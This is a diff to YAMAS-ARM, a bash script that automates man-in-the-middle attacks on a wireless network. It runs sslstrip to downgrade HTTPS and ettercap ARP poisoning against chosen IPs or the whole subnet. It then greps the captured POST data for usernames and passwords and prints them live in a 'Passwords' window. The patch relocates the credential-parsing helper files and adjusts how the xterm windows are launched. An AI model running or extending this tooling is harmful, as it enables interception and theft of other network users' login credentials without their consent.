@@ -4,10 +4,11 @@
 # Based on yamas v0.9 by comaX for pcsci3ence.info
 
 #Version information
-version=0.9.4
+version=0.9.5
 
 # device variables
-pathLog=/home/user/yamas #MyDocs folder is unavailable when USB connected (mass strorage mode) and previous option would fail
+pathLog=/home/user/yamas
+pathApp=/opt/yamas
 
 # if user ^C then execute cleanup function
 trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
@@ -17,7 +18,7 @@ if [ "$(id -u)" != "0" ]; then
    echo -e "\033[31mYou are not running this script as root.\nPlease become root (e.g. \"sudo gainroot\") before launching this script\033[m"
    exit
 fi
-	
+
 #Check if the required dependencies exist.
 dep() {
    echo; echo -en "Checking for the needed dependencies:\n"
@@ -128,11 +129,6 @@ if [ ! -e "$pathLog/.ok" ]; then dep; fi
 if [ ! -d "$pathLog" ]; then
    mkdir $pathLog
 fi
-
-if [ ! -f "/tmp/grepcred.txt" ]; then #in N900 the /tmp is purged at every reboot
-   wget -q http://comax.pagesperso-orange.fr/info/mitm/grepcred.txt -O /tmp/grepcred.txt #downloading temp file nedded for parsing.
-fi   #We do it now : we don't have to download twice in case --parse is used, and the script
-
 #Let's define some arguments that can be passed to the script :
 args=
 while [ "$#" -ge 1 ] #check parameters
@@ -141,18 +137,15 @@ do
    -d | --depend) # force check for dependencies
       clear
       dep # calling the function.
-
-
       ;;
       
-      -v | --version) #Print version and exits
+   -v | --version) #Print version and exits
       clear
       echo "YAMAS - Yet Another Man In The Middle Automation Script"
       echo "Version: $version"
       exit 0 ;;
 
-
-        -p | --parse) #parse a given filename
+   -p | --parse) #parse a given filename
       if [[ "$2" == "" ]]; then 
          echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
          exit 0
@@ -162,7 +155,7 @@ do
       cat $2 |
          awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
          awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
-         egrep -i -a -f /tmp/grepcred.txt |
+         egrep -i -a -f $pathApp/grepcred.txt |
          awk -F "=" '{if (length($2) < 4) print "";
                       else if ($1 ~/Website/) print $0;
                       else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
@@ -170,7 +163,7 @@ do
          uniq
       exit 0 ;;
       
- 	-h | --help) #define help message
+   -h | --help) #define help message
       clear 
       echo -e "You are running $0, YAMAS-ARM.
 
@@ -221,8 +214,8 @@ http://tinyurl.com/yamas-arm or send me a mail at contact.comax@gmail.com
 
 "
       exit ;;
-
-	*) echo "Invalid parameters, continuing with script $0" & sleep 2 ;;
+   
+   *) echo "Invalid parameters, continuing with script $0" & sleep 2 ;;
   esac
   shift
 done
@@ -269,8 +262,8 @@ fast_cleanup() {
    fi
    killall ettercap
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
-   iptables --flush 			         # there are probably too many resets here,
-   iptables --table nat --flush		# but at least we're sure everything's clean
+   iptables --flush                 # there are probably too many resets here,
+   iptables --table nat --flush     # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    if [ -e '/tmp/looparse.sh' ]; then
@@ -292,8 +285,8 @@ cleanup() {
    fi
    killall ettercap
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
-   iptables --flush 			# there are probably too many resets here,
-   iptables --table nat --flush		# but at least we're sure everything's clean
+   iptables --flush                 # there are probably too many resets here,
+   iptables --table nat --flush     # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    rm /tmp/looparse.sh
@@ -322,7 +315,7 @@ cleanup() {
       cat $pathLog/$filename.txt |
          awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
          awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
-         egrep -i -a -f /tmp/grepcred.txt |
+         egrep -i -a -f $pathApp/grepcred.txt |
          awk -F "=" '{if (length($2) < 4) print "";
             else if ($1 ~/Website/) print $0;
             else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
@@ -353,22 +346,18 @@ rescan () {
 add_target() {
    echo "Enter a new IP adress to attack :"
    read newip
-   xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ // 2>/dev/null & sleep 2" &
+   xterm -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ //" 2>/dev/null & sleep 2
    final
 }
 
 ascii() {
    clear
-   if [ ! -f "$pathLog/ascii" ]; then #if the ascii list doesn't exist get it from the web.
-      wget -q http://comax.pagesperso-orange.fr/info/mitm/ascii -O $pathLog/ascii
-   fi
-   cat $pathLog/ascii
-   #rm /tmp/ascii
+   cat $pathApp/ascii
    final
 }
 
 tailsecure() {
-   xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f $pathLog/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
+   xterm -T "Tail-greping for secure references" -e "tail -f $pathLog/$filename.txt | grep 'Resolving host:'" 2> /dev/null & tailgrepid=$!
    final
 }
 
@@ -394,7 +383,7 @@ rtparse() {
       rtparse
    elif [ "$rtp" = "4" ] ; then
       echo -e "\033[32mLaunching...\033[m"
-      xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
+      xterm -hold -T Passwords -e "/tmp/looparse.sh" 2> /dev/null & looparseid=$!
       sleep 2
       rtparse
    elif [ "$rtp" = "5" ] ; then
@@ -474,7 +463,7 @@ fi
 echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in $pathLog/$filename.txt\033[m"
 sslstrip -f -a -k -l $outport -w $pathLog/$filename.txt 2> /dev/null & sslstripid=$!
 
-sleep 2 #let time for sslstrip to launch. Might be a bit too much, but better prevent than heal.
+sleep 5 #let time for sslstrip to launch. Might be a bit too much, but better prevent than heal.
 echo
 echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
 echo
@@ -515,17 +504,21 @@ if [[ "$choicearp" = "D" || "$choicearp" = "d" ]] ; then
    \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
    ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
       while [ "$1" != "" ]; do
-         xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
+         xterm -T "Poisoning $1" -e "ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/" 2>/dev/null & sleep 2
          shift
       done
       echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
    }
    echo "Enter IP adresse(s)."
    read parameters
-   ettercapi $parameters
-
+   if [[ "$parameters" == "" ]]; then 
+      echo -e "No input given. Nothing to target so quitting.."
+      exit 0
+   else
+      ettercapi $parameters
+   fi
 else 
-   xterm -geometry 90x3-1-1 -T ettercap -e 'ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //' &
+   xterm -T ettercap -e "ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //" 2> /dev/null &
    sleep 2
    echo -e "\033[33m Targeting the whole network on $gateway on wlan0 with Ettercap\033[m"
    echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
@@ -537,12 +530,12 @@ echo
 echo "looparse(){
 while :
 do
-	clear
-	echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
-	cat $pathLog/$filename.txt |
+   clear
+   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
+   cat $pathLog/$filename.txt |
       awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
       awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
-      egrep -i -f '/tmp/grepcred.txt' |
+      egrep -i -f '$pathApp/grepcred.txt' |
       awk -F \"=\" '{if (length(\$2) < 3) print \"\";
       else if (\$1 ~/[W]/) print \$0;
       else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
@@ -553,7 +546,7 @@ done
   }
 looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
 chmod +x /tmp/looparse.sh
-xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
+xterm -hold -T Passwords -e "/tmp/looparse.sh" 2> /dev/null & looparseid=$! #here's the beauty
 sleep 2
 final #call the "final" function. Yes, it's the final one.
 ### End of the script fellas.
